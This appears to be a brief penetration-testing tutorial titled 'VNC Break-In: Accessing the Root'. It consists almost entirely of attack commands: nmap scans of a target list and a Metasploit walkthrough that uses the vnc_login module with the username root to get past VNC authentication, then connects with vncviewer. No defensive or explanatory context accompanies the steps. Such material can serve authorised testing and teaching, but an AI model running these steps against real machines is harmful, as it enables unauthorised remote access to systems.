VNC Break-In: Accessing the Root

nmap -p0- -iL target.txt -T4 -oN all-port-nmap-output.txt
nmap -p 5900 -sV -sC -iL target.txt -T4 -oN detailed-nmap-output.txt

Steps to Exploit VNC with Metasploit

msfconsole
search vnc_login
use 0 (auxiliary/scanner/vnc/vnc_login)
options
set RHOST <IP>

set USERNAME root

options
run OR exploit
vncviewer <IP>

Comments